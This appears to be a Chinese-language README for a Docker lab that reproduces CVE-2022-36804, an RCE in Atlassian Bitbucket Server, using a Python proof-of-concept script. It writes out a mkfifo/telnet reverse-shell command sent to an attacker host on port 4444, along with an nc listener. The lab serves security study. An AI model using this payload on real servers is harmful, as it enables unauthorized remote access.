⚠️ 仅供教育和授权安全研究使用
非常感谢原始 PoC 作者 Walnut Security Services Pvt. Ltd
Atlassian Bitbucket Server 与 Data Center 的多个 API 端点(版本 7.0.0 至 7.6.17 之前、7.7.0 至 7.17.10 之前、7.18.0 至 7.21.4 之前、8.0.0 至 8.0.3 之前、8.1.0 至 8.1.3 之前、8.2.0 至 8.2.2 之前,以及 8.3.0 至 8.3.1 之前)允许具有公共或私有 Bitbucket 仓库读取权限的远程攻击者通过发送恶意的 HTTP 请求来执行任意代码。此漏洞由 TheGrandPew 通过我们的漏洞奖励计划报告。
首先,克隆仓库
git clone https://github.com/asepsaepdin/CVE-2022-36804.git
切换目录
cd CVE-2022-36804
构建漏洞容器
docker build -t CVE-2022-36804 .
运行临时容器
docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
检查容器 IP 地址
docker inspect CVE-2022-36804 | grep "IPAddress"
设置 Atlassian Bitbucket 并通过 URL http://172.17.0.3:7990 创建新的公共仓库
检查远程代码执行(RCE)
python3 cve-2022-36804.py -u http://172.17.0.3:7990
使用自定义命令(cmd)检查 RCE
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
从攻击者的角度来看,远程代码执行对于获取交互式 shell 至关重要。因此,执行以下命令将触发基于 bash 的 telnet 反向 shell,通过 tcp 连接到攻击者系统的 4444/tcp 端口:
python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
nc -nlvp 4444